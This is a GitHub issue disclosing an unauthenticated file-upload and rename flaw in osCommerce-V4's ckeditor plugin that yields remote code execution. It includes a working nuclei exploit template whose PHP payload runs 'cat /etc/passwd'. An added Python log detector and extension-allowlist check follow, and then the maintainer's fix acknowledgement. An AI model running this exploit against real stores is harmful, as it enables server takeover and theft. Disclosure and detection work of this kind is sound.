osCommerce / osCommerce-V4


Unauthenticated Arbitrary File Upload #63

Open blockisec opened 7 months ago

blockisec commented 7 months ago

Any unauthenticated user can upload image files using the upload connector of the ckeditor (located at /admin/plugins/ckeditor/fm/connectors/php/upload.php). The uploaded image file can be renamed to a PHP extension in a second step which results in unauthenticated RCE. Renaming of the image file happens in the /admin/plugins/ckeditor/plugins/pdw_file_browser/actions.php endpoint.

The following nuclei template can be used to identify and exploit the vulnerability:

```yaml
id: oscommerce-v4-rce-chain

info:
  name: OSCommerce v4 RCE chain
  tags: oscommerce,php
  author: blocki
  severity: critical

variables:
  payload: '<?php echo system("cat /etc/passwd");?>'
  filename: "{{rand_text_alpha(5)}}"

http:
  - raw:
    - |
      POST /admin/plugins/ckeditor/fm/connectors/php/upload.php?Type=Image HTTP/1.1
      Host: {{Hostname}}
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySnpOFkmOvbSHJX5G

      ------WebKitFormBoundarySnpOFkmOvbSHJX5G
      Content-Disposition: form-data; name="NewFile";filename="{{filename}}.gif";
      Content-Type: image/png

      GIF8
      {{payload}}
      ------WebKitFormBoundarySnpOFkmOvbSHJX5G--

    - |
      POST /admin/plugins/ckeditor/plugins/pdw_file_browser/actions.php HTTP/1.1
      Host: {{Hostname}}
      Content-Type: application/x-www-form-urlencoded

      action=rename&new_filename={{filename}}.php&old_filename={{filename}}.gif&folder=/images/

    matchers:
      - type: dsl
        condition: and
        dsl:
          - status_code_1 == 200 && contains(body_1, "OnUploadCompleted(0") && contains(body_1, "{{filename}}.gif")
          - status_code_2 == 200 && contains(body_2, "Name successfully changed!") && contains(body_2, "success||")

    extractors:
      - type: dsl
        dsl:
          - '"File -> " + BaseURL + "/images/" + filename + ".php"'
```
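The two-step chain described in the report (image upload, then rename to a `.php` extension) leaves a recognisable footprint in the web server access log, and the rename step is where an extension allowlist would have broken it. The following is an added example, not code from the osCommerce project or from the issue reporter: it runs a detection pass over constructed combined-format log lines (the IP addresses, timestamps and `abcde` filename are made up; the endpoint paths are the ones named in the issue) and includes a hypothetical `rename_is_allowed` policy showing the kind of check a file-manager rename handler should enforce. The five-minute correlation window is an assumption.

```python
"""Detection and rename-policy helpers for the ckeditor upload/rename chain.

Added example; not part of osCommerce-V4 or of the issue's nuclei template.
Log lines are constructed; rename_is_allowed is a hypothetical policy, not
the project's actual fix.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Endpoints named in the issue report.
UPLOAD_ENDPOINT = "/admin/plugins/ckeditor/fm/connectors/php/upload.php"
RENAME_ENDPOINT = "/admin/plugins/ckeditor/plugins/pdw_file_browser/actions.php"

# A file-manager rename of an uploaded image should only ever yield an image name.
ALLOWED_IMAGE_EXTENSIONS = {"gif", "jpg", "jpeg", "png", "webp"}


def rename_is_allowed(old_filename: str, new_filename: str) -> bool:
    """Allowlist policy for a rename request (hypothetical guard).

    Both names must be plain basenames (no path separators, no dot-dirs) and
    every dotted suffix of the new name must be an image extension, so
    'x.php' and double extensions such as 'x.php.gif' are both rejected.
    """
    for name in (old_filename, new_filename):
        if not name or "/" in name or "\\" in name or name in (".", ".."):
            return False
    parts = new_filename.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    return all(ext in ALLOWED_IMAGE_EXTENSIONS for ext in parts[1:])


# Combined log format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line: str):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],  # drop the query string
        "status": int(m["status"]),
    }


def find_upload_rename_chains(lines, window=timedelta(minutes=5)):
    """Flag clients that POST to the upload connector and then to the rename
    endpoint within `window`, and list any later request for a .php file
    under /images/ from the same client (a likely execution of the result)."""
    by_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            by_ip[ev["ip"]].append(ev)

    findings = []
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        for i, up in enumerate(events):
            if up["method"] != "POST" or up["path"] != UPLOAD_ENDPOINT:
                continue
            later = [e for e in events[i + 1:] if e["ts"] - up["ts"] <= window]
            rename = next(
                (e for e in later if e["method"] == "POST" and e["path"] == RENAME_ENDPOINT),
                None,
            )
            if rename is None:
                continue
            php_hits = [
                e["path"] for e in later
                if e["ts"] >= rename["ts"]
                and e["path"].startswith("/images/")
                and e["path"].lower().endswith(".php")
            ]
            findings.append({
                "ip": ip,
                "upload_at": up["ts"],
                "rename_at": rename["ts"],
                "php_under_images": php_hits,
            })
    return findings


# Constructed sample log: one client performs the full chain, another only uploads.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Mar/2024:12:00:05 +0000] "POST /admin/plugins/ckeditor/fm/connectors/php/upload.php?Type=Image HTTP/1.1" 200 312',
    '203.0.113.7 - - [10/Mar/2024:12:00:07 +0000] "POST /admin/plugins/ckeditor/plugins/pdw_file_browser/actions.php HTTP/1.1" 200 64',
    '203.0.113.7 - - [10/Mar/2024:12:00:09 +0000] "GET /images/abcde.php HTTP/1.1" 200 1890',
    '198.51.100.4 - - [10/Mar/2024:12:10:00 +0000] "POST /admin/plugins/ckeditor/fm/connectors/php/upload.php?Type=Image HTTP/1.1" 200 312',
    '198.51.100.4 - - [10/Mar/2024:12:30:00 +0000] "GET /images/logo.png HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for f in find_upload_rename_chains(SAMPLE_ACCESS_LOG):
        print(f"{f['ip']}: upload {f['upload_at']:%H:%M:%S}, rename {f['rename_at']:%H:%M:%S}, "
              f"php under /images/: {f['php_under_images']}")
```

The access log does not carry the POST body, so the rename target cannot be read from it; the detection therefore keys on the endpoint sequence and treats a later hit on `/images/*.php` as corroboration. The policy function is the complementary server-side control: with an allowlist on the resulting extension (and no path separators), the second request in the chain fails regardless of whether the first one was authenticated.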
pan-oscom commented 4 months ago

Thank you! I've just committed the fix